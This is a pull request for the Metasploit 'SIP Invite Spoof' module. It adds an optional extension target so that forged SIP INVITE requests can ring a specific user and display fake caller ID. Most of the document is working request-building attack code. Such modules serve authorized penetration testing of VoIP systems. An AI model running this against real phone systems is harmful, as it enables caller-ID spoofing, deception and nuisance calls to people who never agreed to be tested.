### PR TITLE
Sip invite spoof modifications

### DIFF
--- a/modules/auxiliary/voip/sip_invite_spoof.rb
+++ b/modules/auxiliary/voip/sip_invite_spoof.rb
@@ -23,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary
 			'Name'           => 'SIP Invite Spoof',
 			'Version'        => '$Revision$',
 			'Description'    => 'This module will create a fake SIP invite request making the targeted device ring and display fake caller id information.',
-			'Author'         => 'David Maynor <dave[at]erratasec.com>',
+			'Author'         => '[David Maynor <dave[at]erratasec.com>, ChrisJohnRiley]',
 			'License'        =>  MSF_LICENSE
 		)
 
@@ -32,7 +32,8 @@ class Metasploit3 < Msf::Auxiliary
 			[
 				Opt::RPORT(5060),
 				OptString.new('SRCADDR', [true, "The sip address the spoofed call is coming from",'192.168.1.1']),
-				OptString.new('MSG', [true, "The spoofed caller id to send","The Metasploit has you"])
+				OptString.new('MSG', [true, "The spoofed caller id to send","The Metasploit has you"]),
+				OptString.new('EXTENSION', [false, "The specific extension or name to target", nil])
 			], self.class)
 	end
 
@@ -43,18 +44,27 @@ class Metasploit3 < Msf::Auxiliary
 
 			name = datastore['MSG']
 			src = datastore['SRCADDR']
+			ext = datastore['EXTENSION']
+
+			if not ext.nil? and not ext.empty?
+				# set extesion name/number
+				conn_string = "#{ext}@#{ip}"	
+			else
+				conn_string = "#{ip}"	
+			end
+
 			connect_udp
 
-			print_status("Sending Fake SIP Invite to: #{ip}")
+			print_status("Sending Fake SIP Invite to: #{conn_string}")
 
-			req =  "INVITE sip:@127.0.0.1 SIP/2.0" + "\r\n"
-			req << "To: <sip:#{ip}>" + "\r\n"
+			req =  "INVITE sip:#{conn_string} SIP/2.0" + "\r\n"
+			req << "To: <sip:#{conn_string}>" + "\r\n"
 			req << "Via: SIP/2.0/UDP #{ip}" + "\r\n"
 			req << "From: \"#{name}\"<sip:#{src}>" + "\r\n"
 			req << "Call-ID: #{(rand(100)+100)}#{ip}" + "\r\n"
 			req << "CSeq: 1 INVITE" + "\r\n"
 			req << "Max-Forwards: 20" +  "\r\n"
-			req << "Contact: <sip:127.0.0.1>" + "\r\n\r\n"
+			req << "Contact: <sip:#{conn_string}>" + "\r\n\r\n"
 
 			udp_sock.put(req)
 			disconnect_udp

--- a/modules/auxiliary/voip/sip_invite_spoof.rb
+++ b/modules/auxiliary/voip/sip_invite_spoof.rb
@@ -1,5 +1,5 @@
 ##
-# $Id: sip_invite_spoof.rb 15390 2012-06-05 03:03:05Z rapid7 $
+# $Id$
 ##
 
 ##
@@ -21,7 +21,7 @@ class Metasploit3 < Msf::Auxiliary
 	def initialize
 		super(
 			'Name'           => 'SIP Invite Spoof',
-			'Version'        => '$Revision: 15390 $',
+			'Version'        => '$Revision$',
 			'Description'    => 'This module will create a fake SIP invite request making the targeted device ring and display fake caller id information.',
 			'Author'         => '[David Maynor <dave[at]erratasec.com>, ChrisJohnRiley]',
 			'License'        =>  MSF_LICENSE


### PR DESCRIPTION
Added support to use extension (optional)

Example:

testuser@example.com

Previously only the IP address was set (no user@)
